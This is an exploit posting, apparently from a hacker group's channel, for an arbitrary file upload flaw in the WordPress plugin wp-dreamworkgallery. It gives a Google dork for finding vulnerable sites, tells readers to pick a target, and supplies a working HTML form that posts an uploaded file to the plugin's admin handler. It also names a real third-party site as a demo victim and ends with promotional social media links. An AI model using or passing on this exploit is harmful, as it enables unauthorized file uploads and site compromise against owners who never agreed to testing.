##################################################JokerSecurity################################ # Title : Wordpress File Upload Vulnerability 
# Dork : inurl:/wp-content/plugins/wp-dreamworkgallery 
# Tested on: [ Kali-Linux] 
# MyChannel Youtube : https://www.youtube.com/c/Professionalhacker25
# Myblog : http://kader-information.blogspot.com/ 
# Link video : https://www.youtube.com/watch?v=h1xWghkVPEw 
 # Date: 2/04/2017
###################### 
# [+] DESCRIPTION : 
###################### 
# 1: Search Google Dork and Choose a Target 
########### 
Code exploit : 
########### 
<html>
 <body> 
<form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> 
</body> 
</html> 
###### 
# 3 Upload Your File ==== File.html ###### 
Demo : ###### http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml ###################### 
subscribe for my channel and page in facebook 
# My Blogger : http://kader-information.blogspot.com/ 
# Page FacebOOk 1 : https://www.facebook.com/AnonymousPalestine.vip 
# Page Facebook 2 : http://facebook.com/kali.linux.pentesting.tutorials
# Page FacebOOK 3 : https://www.facebook.com/Professional.hacker.25
By <3 ##################################################JokerSecurity###############################